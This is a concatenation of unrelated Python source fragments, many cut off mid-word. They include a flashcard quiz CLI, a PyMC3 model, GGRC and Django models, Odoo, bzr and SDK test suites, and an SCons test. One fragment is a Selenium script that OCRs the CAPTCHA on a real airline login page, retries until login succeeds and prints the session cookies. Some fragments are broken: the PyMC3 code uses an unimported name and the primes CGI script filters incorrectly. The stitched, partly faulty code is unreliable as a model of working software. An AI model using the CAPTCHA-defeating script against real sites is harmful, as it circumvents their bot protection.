ID; otherwise, this program is agnostic about formatting.
New log file entries will have this format: <ID> <field-separator> <timestamp> <field-separator> <result> where <ID> is the unique ID of the line (card) associated with the record, <field-sep
arator> is the CSV field separator, <timestamp> is the record's timestamp (you can modify its format via the -f option), and <result> is the result of the review. For Leitner-system-based reviews, <result> is either '+' or '-'. '+' indicates that the user passed the review at the specified time, whereas '-' indicates that the user failed at the specified time. For SM-2-based reviews, <result> is an integer in the range [0,5] indicating the "quality of review response" that the user provided. (0 indicates a complete memory blackout whereas 5 means the review was a piece of cake.) output: This program shuffles lines and prints them to standard output one at a time in CSV format. After printing a card, this program will wait for a command from the specified command file. Commands are single-word lines terminated by standard newline (\\n) characters. For Leitner-system-based reviews, the commands are: + the user passed the card - the user didn't pass the card q the user is terminating the quiz For SM-2-based reviews, the commands are: 0 quality of review response 0 1 quality of review response 1 2 quality of review response 2 3 quality of review response 3 4 quality of review response 4 5 quality of review response 5 q the user is terminating the quiz All other values are erroneous.""") parser.add_argument("-d", "--dry-run", default=False, action="store_true", help="don't log the results of the review") parser.add_argument("-f", "--date-format", default="%Y年%m月%d日", help="the format of dates/timestamps in the log file (uses date/strftime flags, default: %%Y年%%m月%%d日)") parser.add_argument("-s", "--field-sep", default="\t", help="the CSV field separator (default: \\t)") parser.add_argument("-2", "--use-sm2", default=False, action="store_true", help="use the SM-2 algorithm instead of the Leitner system") parser.add_argument("commandfile", help="a file (usually a named pipe) providing review commands") parser.add_argument("logfile", help="a CSV-formatted file containing records for the deck's lines") args = parser.parse_args() try: ret = Main(stdin, args.logfile, args.commandfile, args.field_sep, args.date_format, args.dry_run, args.use_sm2) except KeyboardInterrupt: ret = 0 exit(ret)
from pymc3 import * import theano.tensor as t from theano.tensor.nlinalg import matrix_inverse as inv from numpy import array, diag, linspace from numpy.random import multivariate_normal # Generate some multivariate normal data: n_obs = 1000 # Mean values: mu = linspace(0, 2, num=4) n_var = len(mu) # Standard deviations: stds = np.ones(4) / 2.0 # Correlation matrix of 4 variables: corr = array([[ 1. , 0.75, 0. , 0.15], [ 0.75, 1. , -0.06, 0.19], [ 0. , -0.06, 1. , -0.04], [ 0.15, 0.19, -0.04, 1. ]]) cov_matrix = diag(stds).dot(corr.dot(diag(stds))) dataset = multivariate_normal(mu, cov_matrix, size=n_obs) # In order to convert the upper triangular correlation values to a complete # correlation matrix, we need to construct an index matrix: n_elem = n_var * (n_var - 1) / 2 tri_index = np.zeros([n_var, n_var], dtype=int) tri_index[np.triu_indices(n_var, k=1)] = np.arange(n_elem) tri_index[np.triu_indices(n_var, k=1)[::-1]] = np.arange(n_elem) with Model() as model: mu = Normal('mu', mu=0, tau=1 ** -2, shape=n_var) # We can specify separate priors for sigma and the correlation matrix: sigma = Uni
form('sigma', shape=n_var) corr_triangle = LKJCorr('corr', n=1, p=n
_var) corr_matrix = corr_triangle[tri_index] corr_matrix = t.fill_diagonal(corr_matrix, 1) cov_matrix = t.diag(sigma).dot(corr_matrix.dot(t.diag(sigma))) like = MvNormal('likelihood', mu=mu, tau=inv(cov_matrix), observed=dataset) def run(n=1000): if n == "short": n = 50 with model: start = find_MAP() step = NUTS(scaling=start) tr = sample(n, step=step, start=start) if __name__ == '__main__': run()
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file> # Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file> # Created By: vraj@reciprocitylabs.com # Maintained By: vraj@reciprocitylabs.com """Defines a Revision model for storing snapshots.""" from ggrc import db from ggrc.models.computed_property import computed_property from ggrc.models.mixins import Base from ggrc.models.types import JsonType class Revision(Base, db.Model): """Revision object holds a JSON snapshot of the object at a time.""" __tablename__ = 'revisions' resource_id = db.Column(db.Integer, nullable=False) resource_type = db.Column(db.String, nullable=False) event_id = db.Column(db.Integer, db.ForeignKey('events.id'), nullable=False) action = db.Column(db.Enum(u'created', u'modified', u'deleted'), nullable=False) content = db.Column(JsonType, nullable=False) source_type = db.Column(db.String, nullable=True) source_id = db.Column(db.Integer, nullable=True) destination_type = db.Column(db.String, nullable=True) destination_id = db.Column(db.Integer, nullable=True) @staticmethod def _extra_table_args(_): return (db.Index('revisions_modified_by', 'modified_by_id'),) _publish_attrs = [ 'resource_id', 'resource_type', 'source_type', 'source_id', 'destination_type', 'destination_id', 'action', 'content', 'description', ] @classmethod def eager_query(cls): from sqlalchemy import orm query = super(Revision, cls).eager_query() return query.options( orm.subqueryload('modified_by'), orm.subqueryload('event'), # used in description ) def __init__(self, obj, modified_by_id, action, content): self.resource_id = obj.id self.modified_by_id = modified_by_id self.resource_type = str(obj.__class__.__name__) self.action = action self.content = content for attr in ["source_type", "source_id", "destination_type", "destination_id"]: setattr(self, attr, getattr(obj, attr, None)) def _description_mapping(self, link_objects): """Compute description for revisions with <-> in display name.""" display_name = self.content['display_name'] source, destination = display_name.split('<->')[:2]
mapping_verb = "linked" if self.resource_type in link_objects else "mapped" if self.action == 'created': result = u"{1} {2} to {0}".format(source, destination, mapping_verb) elif self.action == 'deleted': result = u"{1} un{2} from {0}".format(source, destination, mapping_verb) else: result = u"{0} {1}".format
(display_name, self.action) return result @computed_property def description(self): """Compute a human readable description from action and content.""" link_objects = ['ObjectDocument'] if 'display_name' not in self.content: return '' display_name = self.content['display_name'] if not display_name: result = u"{0} {1}".format(self.resource_type, self.action) elif u'<->' in display_name: result = self._description_mapping(link_objects) else: if 'mapped_directive' in self.content: # then this is a special case of combined map/creation # should happen only for Section and Control mapped_directive = self.content['mapped_directive'] if self.action == 'created': result = u"New {0}, {1}, created and mapped to {2}".format( self.resource_type, display_name, mapped_directive ) elif self.action == 'deleted': result = u"{0} unmapped from {1} and deleted".format( display_name, mapped_directive) else: result = u"{0} {1}".format(display_name, self.action) else: # otherwise, it's a normal creation event result = u"{0} {1}".format(display_name, self.action) if self.event.action == "IMPORT": result += ", via spreadsheet import" return result
from .base import * DEBUG
= True EMAIL_BACKEND
= 'nr.sendmailemailbackend.EmailBackend'
# coding: utf-8 from google.appengine.ext import ndb from flask.ext import restful import flask from api import helpers import auth import model import util from main import api_v1 ############################################################################### # Admin ############################################################################### @api_v1.resource('/admi
n/song/', endpoint='api.admin.song.list') class AdminSongListAPI(restful.Resource): @auth.admin_required def get(self): song_keys = util.param('song_keys', list) if song_keys: s
ong_db_keys = [ndb.Key(urlsafe=k) for k in song_keys] song_dbs = ndb.get_multi(song_db_keys) return helpers.make_response(song_dbs, model.song.FIELDS) song_dbs, song_cursor = model.Song.get_dbs() return helpers.make_response(song_dbs, model.Song.FIELDS, song_cursor) @api_v1.resource('/admin/song/<string:song_key>/', endpoint='api.admin.song') class AdminSongAPI(restful.Resource): @auth.admin_required def get(self, song_key): song_db = ndb.Key(urlsafe=song_key).get() if not song_db: helpers.make_not_found_exception('song %s not found' % song_key) return helpers.make_response(song_db, model.Song.FIELDS)
t 2017 LasLabs Inc. # License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl). import os import mock from odoo.modules import get_module_path from odoo.tests.common import TransactionCase from odoo.tools import mute_logger from odoo.addons.module_auto_update.addon_hash import addon_hash from ..models.module_deprecated import PARAM_DEPRECATED model = 'odoo.addons.module_auto_update.models.module' class EndTestException(Exception): pass class TestModule(TransactionCase): def setUp(self): super(TestModule, self).setUp() module_name = 'module_auto_update' self.env["ir.config_parameter"].set_param(PARAM_DEPRECATED, "1") self.own_module = self.env['ir.module.module'].search([ ('name', '=', module_name), ]) self.own_dir_path = get_module_path(module_name) keep_langs = self.env['res.lang'].search([]).mapped('code') self.own_checksum = addon_hash( self.own_dir_path, exclude_patterns=['*.pyc', '*.pyo', '*.pot', 'static/*'], keep_langs=keep_langs, ) self.own_writeable = os.access(self.own_dir_path, os.W_OK) @mock.patch('%s.get_module_path' % model) def create_test_module(self, vals, get_module_path_mock): get_module_path_mock.return_value = self.own_dir_path test_module = self.env['ir.module.module'].create(vals) return test_module def test_store_checksum_installed_state_installed(self): """It should set the module's checksum_installed equal to checksum_dir when vals contain a ``latest_version`` str.""" self.own_module.checksum_installed = 'test' self.own_module._store_checksum_installed({'latest_version': '1.0'}) self.assertEqual( self.own_module.checksum_installed, self.own_module.checksum_dir, ) def test_store_checksum_installed_state_uninstalled(self): """It should clear the module's checksum_installed when vals contain ``"latest_version": False``""" self.own_module.checksum_installed = 'test' self.own_module._store_checksum_installed({'latest_version': False}) self.assertIs(self.own_module.checksum_installed, False) def test_store_checksum_installed_vals_contain_checksum_installed(self): """It should not set checksum_installed to False or checksum_dir when a checksum_installed is included in vals""" self.own_module.checksum_installed = 'test' self.own_module._store_checksum_installed({ 'state': 'installed', 'checksum_installed': 'test', }) self.assertEqual( self.own_module.checksum_installed, 'test', 'Providing checksum_installed in vals did not prevent overwrite', ) def test_store_checksum_installed_with_retain_context(self): """It should not set checksum_installed to False or checksum_dir when self has context retain_checksum_installed=True""" self.own_module.checksum_installed = 'test' self.own_module.with_context( retain_checksum_installed=True, )._store_checksum_installed({'state': 'installed'}) self.assertEqual( self.own_module.checksum_installed, 'test', 'Providing retain_checksum_installed context did not prevent ' 'overwrite', ) @mock.patch('%s.get_module_path' % model) def test_button_uninstall_no_recompute(self, module_path_mock): """It should not attempt update on `button
_uninstall`.""" module_path_mock.return_value = self.own_dir_path vals = { 'name': 'module_auto_update_test_module', 'state': 'installed', } test_module = self.create_test_module(vals) test_module.checksum_installed = 'test' uninstall_module = self.env['ir.module.module'].search([ ('name', '=', 'web'), ]) uninstall_module.button_uninstall() self.assertNotEqual( test_module.st
ate, 'to upgrade', 'Auto update logic was triggered during uninstall.', ) def test_button_immediate_uninstall_no_recompute(self): """It should not attempt update on `button_immediate_uninstall`.""" uninstall_module = self.env['ir.module.module'].search([ ('name', '=', 'web'), ]) try: mk = mock.MagicMock() uninstall_module._patch_method('button_uninstall', mk) mk.side_effect = EndTestException with self.assertRaises(EndTestException): uninstall_module.button_immediate_uninstall() finally: uninstall_module._revert_method('button_uninstall') def test_button_uninstall_cancel(self): """It should preserve checksum_installed when cancelling uninstall""" self.own_module.write({'state': 'to remove'}) self.own_module.checksum_installed = 'test' self.own_module.button_uninstall_cancel() self.assertEqual( self.own_module.checksum_installed, 'test', 'Uninstall cancellation does not preserve checksum_installed', ) def test_button_upgrade_cancel(self): """It should preserve checksum_installed when cancelling upgrades""" self.own_module.write({'state': 'to upgrade'}) self.own_module.checksum_installed = 'test' self.own_module.button_upgrade_cancel() self.assertEqual( self.own_module.checksum_installed, 'test', 'Upgrade cancellation does not preserve checksum_installed', ) def test_create(self): """It should call _store_checksum_installed method""" _store_checksum_installed_mock = mock.MagicMock() try: self.env['ir.module.module']._patch_method( '_store_checksum_installed', _store_checksum_installed_mock, ) vals = { 'name': 'module_auto_update_test_module', 'state': 'installed', } self.create_test_module(vals) _store_checksum_installed_mock.assert_called_once_with(vals) finally: self.env['ir.module.module']._revert_method( '_store_checksum_installed', ) @mute_logger("openerp.modules.module") @mock.patch('%s.get_module_path' % model) def test_get_module_list(self, module_path_mock): """It should change the state of modules with different checksum_dir and checksum_installed to 'to upgrade'""" module_path_mock.return_value = self.own_dir_path vals = { 'name': 'module_auto_update_test_module', 'state': 'installed', } test_module = self.create_test_module(vals) test_module.checksum_installed = 'test' self.env['base.module.upgrade'].get_module_list() self.assertEqual( test_module.state, 'to upgrade', 'List update does not mark upgradeable modules "to upgrade"', ) @mock.patch('%s.get_module_path' % model) def test_get_module_list_only_changes_installed(self, module_path_mock): """It should not change the state of a module with a former state other than 'installed' to 'to upgrade'""" module_path_mock.return_value = self.own_dir_path vals = { 'name': 'module_auto_update_test_module', 'state': 'uninstalled', } test_module = self.create_test_module(vals) self.env['base.module.upgrade'].get_module_list() self.assertNotEqual( test_module.state, 'to upgrade', 'List update changed state of an uninstalled module', ) def test_write(self): """It should call _store_checksum_installed method""" _store_checksum_installed_mock = mock.MagicMock() self.env['ir.module.module']._patch_method( '_store_checksum_installed', _store_checksum_installed_mock, ) vals = {'state': 'installed'} self.own_module.write(vals) _store_checksu
import json import click from tabulate import tabulate @click.command('notes', short_help='List notes') @click.option('--alert-id', '-i', metavar='UUID', help='alert IDs (can use short 8-char id)') @click.pass_obj def cli(obj, a
lert_id): """List notes.""" client = obj['client'] if alert_id: if obj['output'] == 'json': r = client.http.get('/alert/{}/notes'.format(alert_id)) click.echo(json.dumps(r['notes'], sort_keys=True, indent=4, ensure_ascii=False)) else: timezone = obj['timezone'] headers = { 'id': 'NOTE ID', 'text': 'NOTE', 'user': 'USER', 'type': 'TYPE', 'attributes': 'ATTRIBUTES',
'createTime': 'CREATED', 'updateTime': 'UPDATED', 'related': 'RELATED ID', 'customer': 'CUSTOMER' } click.echo(tabulate([n.tabular(timezone) for n in client.get_alert_notes(alert_id)], headers=headers, tablefmt=obj['output'])) else: raise click.UsageError('Need "--alert-id" to list notes.')
# -*- coding: utf-8 -*- # python+selenium识别验证码 # import re import requests import pytesseract from selenium import webdriver from PIL import Image,Image import time # driver = webdriver.Chrome() driver.maximize_window() driver.get("https://higo.flycua.com/hp/html/login.html") driver.implicitly_wait(30) # 下面用户名和密码涉及到我个人信息,所以隐藏 driver.find_eleme
nt_by_name('memberId').send_keys('xxxxxx') driver.find_element_by_name('password').send_keys('xxxxxx') # 因为验证码不能一次就正确识别,我加了循环,一直识别,直到登录成功 while True:   # 清空验证码输入框,因为可能已经识别过一次了,里面有之前识别的错的验证码 driver.find_element_by_name("verificationCode").clear() # 截图或验证码图片保存地址 screenImg = "H:\screenImg.
png" # 浏览器页面截屏 driver.get_screenshot_as_file(screenImg) # 定位验证码位置及大小 location = driver.find_element_by_name('authImage').location size = driver.find_element_by_name('authImage').size   # 下面四行我都在后面加了数字,理论上是不用加的,但是不加我这截的不是验证码那一块的图,可以看保存的截图,根据截图修改截图位置 left = location['x'] + 530 top = location['y'] + 175 right = location['x'] + size['width'] + 553 bottom = location['y'] + size['height'] + 200 # 从文件读取截图,截取验证码位置再次保存 img = Image.open(screenImg).crop((left, top, right, bottom))   # 下面对图片做了一些处理,能更好识别一些,相关处理再百度看吧 img = img.convert('RGBA') # 转换模式:L | RGB img = img.convert('L') # 转换模式:L | RGB img = Image.Contrast(img) # 增强对比度 img = img.enhance(2.0) # 增加饱和度 img.save(screenImg) # 再次读取识别验证码 img = Image.open(screenImg) code = pytesseract.image_to_string(img) # 打印识别的验证码 # print(code.strip()) # 识别出来验证码去特殊符号,用到了正则表达式,这是我第一次用,之前也没研究过,所以用的可能粗糙,请见谅 b = '' for i in code.strip(): pattern = re.compile(r'[a-zA-Z0-9]') m = pattern.search(i) if m != None: b += i # 输出去特殊符号以后的验证码 print(b) # 把b的值输入验证码输入框 driver.find_element_by_name("verificationCode").send_keys(b)   # 点击登录按钮 driver.find_element_by_class_name('login-form-btn-submit').click()   # 定时等待5秒,如果验证码识别错误,提示验证码错误需要等一会儿才能继续操作 time.sleep(5)   # 获取cookie,并把cookie转化为字符串格式 cookie1 = str(driver.get_cookies()) print(cookie1) # 第二次用正则表达式,同样有点粗糙,代码实现的功能就是看cookie里是否有tokenId这个词,如果有说明登录成功,跳出循环,可以进行后面的自动化操作,如果没有,则表示登录失败,继续识别验证码 matchObj = re.search(r'tokenId', cookie1, re.M | re.I) if matchObj: print(matchObj.group()) break else: print("No match!!") print('结束')
""" def create_repository(self, shared=False): """See ControlDir.create_repository.""" return "A repository" def open_repository(self): """See ControlDir.open_repository.""" return SampleRepository(self) def create_branch(self, name=None): """See ControlDir.create_branch.""" if name is not None: raise NoColocatedBranchSupport(self) return SampleBranch(self) def create_workingtree(self): """See ControlDir.create_workingtree.""" return "A tree" class SampleBzrDirFormat(bzrdir.BzrDirFormat): """A sample format this format is initializable, unsupported to aid in testing the open and open_downlevel routines. """ def get_format_string(self): """See BzrDirFormat.get_format_string().""" return "Sample .bzr dir format." def initialize_on_transport(self, t): """Create a bzr dir.""" t.mkdir('.bzr') t.put_bytes('.bzr/branch-format', self.get_format_string()) return SampleBzrDir(t, self) def is_supported(self): return False def open(self, transport, _found=None): return "opened branch." @classmethod def from_string(cls, format_string): return cls() class BzrDirFormatTest1(bzrdir.BzrDirMetaFormat1): @staticmethod def get_format_string(): return "Test format 1" class BzrDirFormatTest2(bzrdir.BzrDirMetaFormat1): @staticmethod def get_format_string(): return "Test format 2" class TestBzrDirFormat(TestCaseWithTransport): """Tests for the BzrDirFormat facility.""" def test_find_format(self): # is the right format object found for a branch? # create a branch with a few known format objects. bzrdir.BzrProber.formats.register(BzrDirFormatTest1.get_format_string(), BzrDirFormatTest1()) self.addCleanup(bzrdir.BzrProber.formats.remove, BzrDirFormatTest1.get_format_string()) bzrdir.BzrProber.formats.register(BzrDirFormatTest2.get_format_string(), BzrDirFormatTest2()) self.addCleanup(bzrdir.BzrProber.formats.remove, BzrDirFormatTest2.get_format_string()) t = self.get_transport() self.build_tree(["foo/", "bar/"], transport=t) def check_format(format, url): format.initialize(url) t = _mod_transport.get_transport_from_path(url) found_format = bzrdir.BzrDirFormat.find_format(t) self.assertIsInstance(found_format, format.__class__) check_format(BzrDirFormatTest1(), "foo") check_format(BzrDirFormatTest2(), "bar") def test_find_format_nothing_there(self): self.assertRaises(NotBranchError, bzrdir.BzrDirFormat.find_format, _mod_transport.get_transport_from_path('.')) def test_find_format_unknown_format(self): t = self.get_transport() t.mkdir('.bzr') t.put_bytes('.bzr/branch-format', '') self.assertRaises(UnknownFormatError, bzrdir.BzrDirFormat.find_format, _mod_transport.get_transport_from_path('.')) def test_register_unregister_format(self): format = SampleBzrDirFormat() url = self.get_url() # make a bzrdir format.initialize(url) # register a format for it. bzrdir.BzrProber.formats.register(format.get_format_string(), format) # which bzrdir.Open will refuse (not supported) self.assertRaises(UnsupportedFormatError, bzrdir.BzrDir.open, url) # which bzrdir.open_containing will refuse (not supported) self.assertRaises(UnsupportedFormatError, bzrdir.BzrDir.open_containing, url) # but open_downlevel will work t = _mod_transport.get_transport_from_url(url) self.assertEqual(format.open(t), bzrdir.BzrDir.open_unsupported(url)) # unregister the format bzrdir.BzrProber.formats.remove(format.get_format_string()) # now open_downlevel should fail too. self.assertRaises(UnknownFormatError, bzrdir.BzrDir.open_unsupported, url) def test_create_branch_and_repo_uses_default(self): format = SampleBzrDirFormat() branch = bzrdir.BzrDir.create_branch_and_repo(self.get_url(), format=format) self.assertTrue(isinstance(branch, SampleBranch)) def test_create_branch_and_repo_under_shared(self): # creating a branch and repo in a shared repo uses the # shared repository format = controldir.format_registry.make_bzrdir('knit') self.make_repository('.', shared=True, format=format) branch = bzrdir.BzrDir.create_branch_and_repo( self.get_url('child'), format=format) self.assertRaises(errors.NoRepositoryPresent, branch.bzrdir.open_repository) def test_create_branch_and_repo_under_shared_force_new(self): # creating a branch and repo in a shared repo can be forced to # make a new repo format = controldir.format_re
gistry.make_bzrdir('knit') self.make_repository('.', shared=True, format=format) branch = bzrdir.BzrDir.create_branch_and_repo(self.get_url('child'), force_new_repo=True, format=format) branch.bzrdir.open
_repository() def test_create_standalone_working_tree(self): format = SampleBzrDirFormat() # note this is deliberately readonly, as this failure should # occur before any writes. self.assertRaises(errors.NotLocalUrl, bzrdir.BzrDir.create_standalone_workingtree, self.get_readonly_url(), format=format) tree = bzrdir.BzrDir.create_standalone_workingtree('.', format=format) self.assertEqual('A tree', tree) def test_create_standalone_working_tree_under_shared_repo(self): # create standalone working tree always makes a repo. format = controldir.format_registry.make_bzrdir('knit') self.make_repository('.', shared=True, format=format) # note this is deliberately readonly, as this failure should # occur before any writes. self.assertRaises(errors.NotLocalUrl, bzrdir.BzrDir.create_standalone_workingtree, self.get_readonly_url('child'), format=format) tree = bzrdir.BzrDir.create_standalone_workingtree('child', format=format) tree.bzrdir.open_repository() def test_create_branch_convenience(self): # outside a repo the default convenience output is a repo+branch_tree format = controldir.format_registry.make_bzrdir('knit') branch = bzrdir.BzrDir.create_branch_convenience('.', format=format) branch.bzrdir.open_workingtree() branch.bzrdir.open_repository() def test_create_branch_convenience_possible_transports(self): """Check that the optional 'possible_transports' is recognized""" format = controldir.format_registry.make_bzrdir('knit') t = self.get_transport() branch = bzrdir.BzrDir.create_branch_convenience( '.', format=format, possible_transports=[t]) branch.bzrdir.open_workingtree() branch.bzrdir.open_repository() def test_create_branch_convenience_root(self): """Creating a branch at the root of a fs should work.""" self.vfs_transport_factory = memory.MemoryServer # outside a repo the default convenience output is a repo+branch_tree format = controldir.format_registry.make_bzrdir('knit') branch = bzrdir.BzrDir.create_branch_convenience(self.get_url(), format=format) self.assertRaises(errors.NoWorkingTree, branch.bzrdir.open_workingtree) branch.bzrdir.open_repository() def test_create_branc
# -*- coding: utf-8 -*- # Generated by Django 1.10.5 on 2017-03-07 06:05 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('news', '0003_auto_20170228_2249'), ] operations = [ migrations.CreateModel( name='Location', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('city', models.CharField(default='Testville', max_length=200)), ('state', models.CharField(default='Montigania', max_length=200)), ], ), migrations.AddField( model_name='newspaper', name='next_paper', field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='news.Newspaper'), ), migrations.AddField( model_name='newspaper
', name='prev_paper', field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='news.Newspaper'), ), migrations.AlterField( model_name='newspaper', name='date
_ended', field=models.DateField(blank=True, null=True, verbose_name='date ended'), ), migrations.AlterUniqueTogether( name='location', unique_together=set([('city', 'state')]), ), migrations.AddField( model_name='newspaper', name='location', field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='news.Location'), ), ]
# coding: utf-8 # Copyright (c) Pymatgen Development Team. # Distributed under the terms of the MIT License. #!/usr/bin/env python from __future__ impo
rt division, unicode_literals """ #TODO: Write module doc. """ __author__ = 'Shyue Ping Ong' __copyright__ = 'Copyright 2013, The Materials Virtual Lab' __version__ = '0.1' __maintainer__ = 'Shyue Ping Ong' __email__ = 'ongsp@ucsd.edu' __date__ = '8/1/15' import warnings warnings.warn("pymatgen.io.aseio
has been moved pymatgen.io.ase. This stub " "will be removed in pymatgen 4.0.", DeprecationWarning) from .ase import *
#!/usr/bin/env python3 """tests.test_io.test_read_gfa.py: tests for exfi.io.read_gfa.py""" from unittest import TestCase, main from exfi.io.read_gfa import read_gfa1 from tests.io.gfa1 import \ HEADER, \ SEGMENTS_EMPTY, SEGMENTS_SIMPLE, SEGMENTS_COMPLEX, \ SEGMENTS_COMPLEX_SOFT, SEGMENTS_COMPLEX_HARD, \ LINKS_EMPTY, LINKS_SIMPLE, LINKS_COMPLEX, \ CONTAINMENTS_EMPTY, CONTAINMENTS_SIMPLE, CONTAINMENTS_COMPLEX, \ PATHS_EMPTY, PATHS_SIMPLE, PATHS_COMPLEX, \ GFA1_EMPTY_FN, GFA1_SIMPLE_FN, GFA1_COMPLEX_FN, \ GFA1_COMPLEX_SOFT_FN, GFA1_COMPLEX_HARD_FN class TestReadGFA1(TestCase): """Tests for exfi.io.read_gfa.read_gfa1""" def test_empty(self): """exfi.io.read_gfa.read_gfa1: empty case""" gfa1 = read_gfa1(GFA1_EMPTY_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_EMPTY)) self.assertTrue(gfa1['links'].equals(LINKS_EMPTY)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_EMPTY)) self.assertTrue(gfa1['paths'].equals(PATHS_EM
PTY)) def test_simple(self): """ex
fi.io.read_gfa.read_gfa1: simple case""" gfa1 = read_gfa1(GFA1_SIMPLE_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_SIMPLE)) self.assertTrue(gfa1['links'].equals(LINKS_SIMPLE)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_SIMPLE)) self.assertTrue(gfa1['paths'].equals(PATHS_SIMPLE)) def test_complex(self): """exfi.io.read_gfa.read_gfa1: complex case""" gfa1 = read_gfa1(GFA1_COMPLEX_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX)) self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX)) self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX)) def test_complex_soft(self): """exfi.io.read_gfa.read_gfa1: complex and soft masking case""" gfa1 = read_gfa1(GFA1_COMPLEX_SOFT_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX_SOFT)) self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX)) self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX)) def test_complex_hard(self): """exfi.io.read_gfa.read_gfa1: complex and hard masking case""" gfa1 = read_gfa1(GFA1_COMPLEX_HARD_FN) self.assertTrue(gfa1['header'].equals(HEADER)) self.assertTrue(gfa1['segments'].equals(SEGMENTS_COMPLEX_HARD)) self.assertTrue(gfa1['links'].equals(LINKS_COMPLEX)) self.assertTrue(gfa1['containments'].equals(CONTAINMENTS_COMPLEX)) self.assertTrue(gfa1['paths'].equals(PATHS_COMPLEX)) if __name__ == '__main__': main()
# coding=utf-8 import json import codecs import os import transaction from nextgisweb import DBSession from nextgisweb.vector_layer import VectorLayer from nextgisweb_compulink.compulink_admin.model import BASE_PATH def update_actual_lyr_names(args): db_session = DBSession() transaction.manager.begin() # what update upd_real_layers = ['real_access_point', 'real_fosc', 'real_optical_cable', 'real_optical_cable_point', 'real_optical_cross', 'real_special_transition', 'real_special_transition_point'] upd_real_lyr_names = {} # new names (already in templates!) real_layers_template_path = os.path.join(BASE_PATH, 'real_layers_templates/') for up_lyr_name in upd_real_layers: with codecs.open(os.path.join(real_layers_template_path, up_lyr_name + '.json'), encoding='utf-8') as json_file: json_layer_struct = json.load(json_file, encoding='utf-8') new_name = json_layer_struct['resource']['display_name'] upd
_real_lyr_names[up_lyr_name] = new_name # update now resources = db_session.query(VectorLayer).filter(VectorLayer.keyname.like('real_%')).all() for vec_layer in resources: lyr_name = vec_layer.keyname if not lyr_name:
continue for up_lyr_name in upd_real_lyr_names.keys(): if lyr_name.startswith(up_lyr_name) and not lyr_name.startswith(up_lyr_name + '_point'): # ugly! vec_layer.display_name = upd_real_lyr_names[up_lyr_name] print '%s updated' % lyr_name break transaction.manager.commit() db_session.close()
# # SPDX-License-Identifier: MIT # import os import shutil import unittest from oeqa.core.utils.path import remove_safe from oeqa.sdk.case import OESDKTestCase from oeqa.utils.subprocesstweak import errors_have_output errors_have_output() class GccCompileTest(OESDKTestCase): td_vars = ['MACHINE'] @classmethod def setUpClass(self): files = {'test.c' : self.tc.files_di
r, 'test.cpp' : self.tc.files_dir, 'testsdkmakefile' : self.tc.sdk_files_dir} for f in files: shutil.copyfile(os.path.join(files[f], f),
os.path.join(self.tc.sdk_dir, f)) def setUp(self): machine = self.td.get("MACHINE") if not (self.tc.hasHostPackage("packagegroup-cross-canadian-%s" % machine) or self.tc.hasHostPackage("^gcc-", regex=True)): raise unittest.SkipTest("GccCompileTest class: SDK doesn't contain a cross-canadian toolchain") def test_gcc_compile(self): self._run('$CC %s/test.c -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir)) def test_gpp_compile(self): self._run('$CXX %s/test.c -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir)) def test_gpp2_compile(self): self._run('$CXX %s/test.cpp -o %s/test -lm' % (self.tc.sdk_dir, self.tc.sdk_dir)) def test_make(self): self._run('cd %s; make -f testsdkmakefile' % self.tc.sdk_dir) @classmethod def tearDownClass(self): files = [os.path.join(self.tc.sdk_dir, f) \ for f in ['test.c', 'test.cpp', 'test.o', 'test', 'testsdkmakefile']] for f in files: remove_safe(f)
#!/usr/bin/env
python3 print('Content-type: text/html') print() primes = [2, *range(3, 10001, 2)] for div in primes: idx = div + 1 while(idx < len(primes)): if (primes[idx] % div == 0): del primes[idx] idx += 1 print(primes)
#!/usr/bin/env python # # Copyright (c) 2001 - 2016 The SCons Foundation # # Permission is hereby granted, free of charge, to any person obtaini
ng # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial po
rtions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # __revision__ = "test/SWIG/SWIGOUTDIR.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog" """ Verify that use of the $SWIGOUTDIR variable causes SCons to recognize that Java files are created in the specified output directory. """ import TestSCons test = TestSCons.TestSCons() swig = test.where_is('swig') if not swig: test.skip_test('Can not find installed "swig", skipping test.\n') where_java_include=test.java_where_includes() if not where_java_include: test.skip_test('Can not find installed Java include files, skipping test.\n') test.write(['SConstruct'], 